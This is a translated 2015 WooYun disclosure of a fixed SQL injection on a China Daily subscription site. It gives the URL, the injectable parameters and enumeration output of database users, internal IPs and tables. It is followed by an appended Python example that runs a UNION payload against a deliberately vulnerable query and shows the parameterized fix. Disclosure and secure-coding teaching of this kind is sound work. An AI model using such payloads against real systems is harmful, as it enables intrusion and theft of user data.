Vulnerability summary (followers: 24)
Defect ID: wooyun-2015-0110555
Title: Root-privilege MySQL injection on a China Daily website (large amount of sensitive information)
Vendor: China Daily website (中国日报网)
Author: 大懒
Submitted: 2015-04-27 09:28
Fixed: 2015-06-09 12:54
Published: 2015-06-09 12:54
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 13
Status: Fixed by vendor
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-04-27: Details sent to the vendor, awaiting vendor action
2015-04-30: Vendor confirmed; details visible to the vendor only
2015-05-10: Details opened to core white hats and relevant domain experts
2015-05-20: Details opened to regular white hats
2015-05-30: Details opened to intern white hats
2015-06-09: Vendor fixed the vulnerability and published it voluntarily; details opened to the public
Brief description:
Root-privilege MySQL injection on a China Daily website
Detailed description:
URL: http://subscribe.chinadaily.com.cn/subReceiptQuery/select.action
POST parameters: Submit=%e5%bc%80%e5%a7%8b%e6%90%9c%e7%b4%a2&endtime=&starttime=1&Submit2=%e5%85%b3%e9%97%ad%e7%aa%97%e5%8f%a3&username=amyanhaj (Submit and Submit2 are the URL-encoded button labels 开始搜索 "start search" and 关闭窗口 "close window"; note that endtime is sent empty and starttime=1)
Injectable parameters: endtime, starttime
database management system users [10]:
[*] 'androidpad'@'192.168.126.31'
[*] 'chinadaily'@'localhost'
[*] 'master'@'172.20.126.52'
[*] 'master'@'192.168.126.32'
[*] 'master'@'192.168.126.33'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
available databases [5]:
[*] cds
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: cds
[64 tables]
+------------------+
| cp_dingjiacl |
| cp_dingjiaclmx |
| cp_jichucp |
| cp_jichucpzh |
| cp_waibudyxx |
| cp_zuhecp |
| jc_diqu |
| jc_faxingqd |
| jc_wenjian |
| lxs_epaperzy |
| lxs_identity |
| qam_duihuajrzt |
| qam_duihuasjx |
| qam_duihuasjz |
| qam_gongneng |
| qam_gongnengbz |
| qam_gongnengdh |
| qam_gongnenghd |
| qam_guanxiys |
| qam_guanxiysx |
| qam_i18n |
| qam_jihey |
| qam_jiheyz |
| qam_minglingcs |
| qam_minglingkzjg |
| qam_mokuaihf |
| qam_quanjubl |
| qam_seq |
| qam_seq_value |
| qam_shiti |
| qam_shiwudy |
| qam_shujufl |
| qam_shujuy |
| qam_shuxing |
| qam_xitongcd |
| qam_yewudy |
| qam_yewudygnpz |
| qam_yewudystpz |
| v_dingdanxx |
| v_gongnengdh |
| v_gongnenghd |
| v_gongnengmk |
| v_identity |
| v_identity_pad |
| v_shujufl |
| view_chanpinfxcl |
| view_faxingqys |
| view_huiyuanxx |
| view_quanxz |
| view_zuhecpdqs |
| xt_forbidlist |
| xt_quanxiansz |
| xt_quanxianz |
| xt_quanxianzpz |
| xt_renyuanxx |
| xt_rizhi |
| xt_shujuhqx |
| xt_shujulqx |
| xt_yonghu |
| yw_dingdan |
| yw_dingdanlsjl |
| yw_huiyuan |
| yw_huiyuantddz |
| yw_jichudd |
+------------------+
From there the Tomcat management backend was located as well.
Proof of vulnerability:
As above.
Fix recommendation:
1. Change the address of the management backend, or block access to it altogether (Tomcat's RemoteAddrValve can restrict the Manager application to trusted source addresses).
2. Use parameterized SQL statements (prepared statements) instead of concatenating the starttime/endtime values into the query text.
Copyright notice: please credit the source when reprinting: 大懒@乌云
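The pattern behind recommendation 2, as an added example that is not code from the report or from chinadaily.com.cn: the live endpoint is a Java/Struts action, and this is an illustrative Python/sqlite3 port of the same dynamic-WHERE query, vulnerable form beside the parameterized form. The table names yw_dingdan and xt_yonghu come from the dump above; their columns, rows and the password hash are constructed for the example, and the UNION payload is a generic one, not the payload used in the report.

```python
import sqlite3

# Constructed stand-in for the site's `cds` database: the table names yw_dingdan
# (orders) and xt_yonghu (users) appear in the report's table list, but the
# columns, rows and the hash value are assumptions made up for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE yw_dingdan (id INTEGER, username TEXT, order_time TEXT);
        CREATE TABLE xt_yonghu  (username TEXT, password_hash TEXT);
        INSERT INTO yw_dingdan VALUES (1, 'amyanhaj', '2015-03-01'),
                                      (2, 'amyanhaj', '2015-04-10'),
                                      (3, 'someone',  '2015-04-20');
        INSERT INTO xt_yonghu VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn

def build_query_vulnerable(username, starttime, endtime):
    """Concatenates request parameters straight into the SQL text. Blank values
    are skipped, which is why the original request could send endtime= empty."""
    sql = "SELECT id, username, order_time FROM yw_dingdan WHERE username = '%s'" % username
    if starttime:
        sql += " AND order_time >= '%s'" % starttime
    if endtime:
        sql += " AND order_time <= '%s'" % endtime
    return sql

def build_query_safe(username, starttime, endtime):
    """Same dynamic WHERE clause, but every value travels as a bound parameter,
    so the SQL text never contains attacker-controlled characters."""
    sql = "SELECT id, username, order_time FROM yw_dingdan WHERE username = ?"
    params = [username]
    if starttime:
        sql += " AND order_time >= ?"
        params.append(starttime)
    if endtime:
        sql += " AND order_time <= ?"
        params.append(endtime)
    return sql, params

def run_vulnerable(username, starttime, endtime):
    return make_db().execute(build_query_vulnerable(username, starttime, endtime)).fetchall()

def run_safe(username, starttime, endtime):
    sql, params = build_query_safe(username, starttime, endtime)
    return make_db().execute(sql, params).fetchall()

# A UNION payload placed in starttime, one of the two parameters the report
# names as injectable. The trailing "-- " comments out the rest of the query.
UNION_PAYLOAD = "x' UNION SELECT 1, username, password_hash FROM xt_yonghu -- "

if __name__ == "__main__":
    # Legitimate request with the same shape as the one in the report.
    print(run_vulnerable("amyanhaj", "1", ""))
    # Vulnerable path: the UNION executes and the user table comes back.
    print(run_vulnerable("amyanhaj", UNION_PAYLOAD, ""))
    # Parameterized path: the payload is just an odd date string and matches nothing.
    print(run_safe("amyanhaj", UNION_PAYLOAD, ""))
```

Binding the values fixes the injection itself, but the dump above also shows the application reaching the database as 'root'@'%' with the `mysql` schema in view. A dedicated account granted only what the subscription query needs on `cds` would have kept even a successful injection away from other schemas and from the credentials in the user list.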
Vulnerability response
Vendor response:
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-04-30 15:19
Vendor reply:
Already contacted colleagues, fix in progress.. Even the backend got exposed..
Latest status:
2015-06-09: Thanks, the vulnerability has been fixed.